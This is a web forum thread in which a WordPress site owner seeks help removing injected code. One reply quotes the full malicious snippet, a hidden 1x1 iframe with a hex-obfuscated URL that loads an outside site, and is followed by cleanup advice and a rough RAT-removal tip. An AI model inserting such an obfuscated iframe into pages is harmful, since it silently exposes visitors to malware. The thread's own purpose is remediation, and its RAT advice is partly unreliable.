I have a virus on pulsating*ws If you look in source at the end is a <!ad> How to remove it ,,, i haven`t it in source. Avast says it`s a JS:ScriptIP-inf [Trj] Also when i checked http://wepawet.cs.ucsb.edu/ It says that the ad redirects users to: http://style-boards.com/forum/ more virus there.. Please HELP!! Thanks
Remove this code <!-- ad --><script>var jojo = document.createElement('iframe');jojo.setAttribute('width', '1');jojo.setAttribute('height', '1');jojo.setAttribute('style', 'display:none');jojo.setAttribute('src', '\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x79\x6C\x65\x2D\x62\x6F\x61\x72\x64\x73\x2E\x63\x6F\x6D\x2F\x66\x6F\x72\x75\x6D\x2F\x66\x6F\x72\x75\x6D\x2E\x70\x68\x70\x3F\x73\x3D\x30\x64\x31\x36\x30\x39\x33\x32\x30\x30');document.body.appendChild(jojo);</script><!-- /ad --> from ur footer
yup check your theme files to see if it's in there. If you can't find it, disable all plugins which will hopefully stop it displaying and activate them one by one to see which makes it come back
I dezactivated all plugins... it`s not in source...i can`t find it.. Here is my footer: <!-- begin footer --> <!--Link on right to go to top ( only for firefox )--> <?php wp_footer(); ?> <div class="clear"></div> <div class="footer"> © 2009-pulsating.ws All Rights Reserved. </div> </div> <!-- <?php echo get_num_queries(); ?> queries. <?php timer_stop(1); ?> seconds. --> </body></html> and the code is under </html> Any help Please Thanks
That`s the catch... Has nothing suspect.. <?php get_header(); ?> <div class="contwrap"> <?php get_sidebar(); ?> <div class="left"> <center> <script language="JavaScript" type="text/javascript"> <!-- ctxt_ad_partner = "7751569400"; ctxt_ad_section = "72999"; ctxt_ad_bg = "99FF66"; ctxt_ad_width = 468; ctxt_ad_height = 60; ctxt_ad_bc = "689526"; ctxt_ad_cc = "75BA72"; ctxt_ad_lc = "401F7A"; ctxt_ad_tc = "232D0B"; ctxt_ad_uc = "401F7A"; // --> </script> <script language="JavaScript" src="http://ypn-js.overture.com/partner/js/ypn.js"> </script> </center> <?php if (have_posts()) : while (have_posts()) : the_post(); ?> <div class="post" id="post-<?php the_ID(); ?>"> <div class="posttop"> <div class="date"> <div class="day"> <?php the_time('d', '', ''); ?> </div> <div class="month"><?php the_time('M', '', ''); ?></div> </div> <h1 class="posttitle"><a href="<?php the_permalink() ?>" rel="bookmark"> <?php the_title(); ?> </a></h1> <div class="indexomment"><?php comments_popup_link(__('0 Comments'), __(' 1 Comment'), __(' % Comments')); ?></div> <div class="clear"></div> <div class="storycontent"> <?php the_content(__('more...')); ?> </div> <?php if(is_single()){ ?> <div class="entry-meta"> <?php printf(__('This entry was written by %1$s and posted on <abbr class="published" title="%2$sT%3$s">%4$s at %5$s</abbr> and filed under %6$s. Bookmark the <a href="%7$s" title="Permalink to %8$s" rel="bookmark">permalink</a>. Follow any comments here with the <a href="%9$s" title="Comments RSS to %8$s" rel="alternate" type="application/rss+xml">RSS feed for this post</a>.', 'sandbox'), '<span class="author vcard"><a class="url fn n" href="'.get_author_link(false, $authordata->ID, $authordata->user_nicename).'" title="' . sprintf(__('View all posts by %s', 'sandbox'), $authordata->display_name) . '">'.get_the_author().'</a></span>', get_the_time('Y-m-d'), get_the_time('H:i:sO'), the_date('', '', '', false), get_the_time(), get_the_category_list(', '), get_permalink(), wp_specialchars(get_the_title(), 'double'), comments_rss() ) ?> <?php if (('open' == $post-> comment_status) && ('open' == $post->ping_status)) : // Comments and trackbacks open ?> <?php printf(__('<a class="comment-link" href="#postcomment" title="Post a comment">Post a comment</a> or leave a trackback: <a class="trackback-link" href="%s" title="Trackback URL for your post" rel="trackback">Trackback URL</a>.', 'sandbox'), get_trackback_url()) ?> <?php elseif (!('open' == $post-> comment_status) && ('open' == $post->ping_status)) : // Only trackbacks open ?> <?php printf(__('Comments are closed, but you can leave a trackback: <a class="trackback-link" href="%s" title="Trackback URL for your post" rel="trackback">Trackback URL</a>.', 'sandbox'), get_trackback_url()) ?> <?php elseif (('open' == $post-> comment_status) && !('open' == $post->ping_status)) : // Only comments open ?> <?php printf(__('Trackbacks are closed, but you can <a class="comment-link" href="#postcomment" title="Post a comment">post a comment</a>.', 'df')) ?> <?php elseif (!('open' == $post-> comment_status) && !('open' == $post->ping_status)) : // Comments and trackbacks closed ?> <?php _e('Both comments and trackbacks are currently closed.') ?> <?php endif; ?> <?php edit_post_link(__('Edit', 'df'), "\n\t\t\t\t\t<span class=\"edit-link\">", "</span>"); ?> </div> <?php } ?> <?php if(is_single()){ ?> <script type="text/javascript"><!-- google_ad_client = "pub-7138347755911117"; google_ad_width = 728; google_ad_height = 90; google_ad_format = "728x90_as"; google_ad_type = "text"; //2007-05-27: CSS XHTML, Design, Web Design, photoshop design, web 2.0 google_ad_channel = "1747091900+9564706439+0274153584+5471741700+1230736743"; google_color_border = "FFFFFF"; google_color_bg = "FFFFFF"; google_color_link = "78B749"; google_color_text = "7F7F7F"; google_color_url = "3D81EE"; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> <?php } ?> <div class="feedback"> <?php wp_link_pages(); ?> </div> </div> <?php comments_template(); // Get wp-comments.php template ?> </div> <?php endwhile; else: ?> <p class="sorrydialog"> <?php _e('Sorry, no posts matched your criteria.'); ?> </p> <?php endif; ?> <div class="navigation"> <?php if(function_exists('wp_pagenavi')) { wp_pagenavi(); } ?> </div> <!--<?php posts_nav_link(' ', __('« Previous Page'), __('Next Page »')); ?>--> </div> </div> <?php get_footer(); ?> HTML:
i mean the wordpress index.php not the template .. check the wordpress files he might have added it somewhere in there also check ur .htaccess
<!-- begin footer --> <!--Link on right to go to top ( only for firefox )--> <?php wp_footer(); ?> <div class="clear"></div> <div class="footer"> © 2009-pulsating.ws All Rights Reserved. </div> </div> <!-- <?php echo get_num_queries(); ?> queries. <?php timer_stop(1); ?> seconds. --> </body></html> HTML: It is not in footer i`ll check now, thanks a lot man
nice guide. Also, if your computer is infected with a RAT (Remote admin tool - that gives full access to the hacker... e.g. you see your mouse moving automatically. LOL ) Do this > 1. open CMD (Start > RUN > type: cmd ) 2. Type in: netstat - ano (it shows all ur network accessing process with their Process identification codes = PID ) 3. if you see a Text like this > ESTABLISHED with a foreign IP, note down its PID. It will also show the EXE accessing it. 4. go to TASK MANAGER (CLTR + ALT + DEL) - then go to VIEW > Tick PID 5. in the Proccess TAB > just click that PID process EXE file. 6. now disconnect your internet & scan your whole Computer with SpyBot SD 1.6 & NOD32 v.4 7. your are virus free now. NOTE: you will say why didnt i disconnected internet at Start !! thats cus teh RAT virus will also get exit, will come again whn u access the net & netstat needs internet connection ON to show PID.
^^FAIL! After you disabled the plugins did the virus code still show up in the source of the webpage?...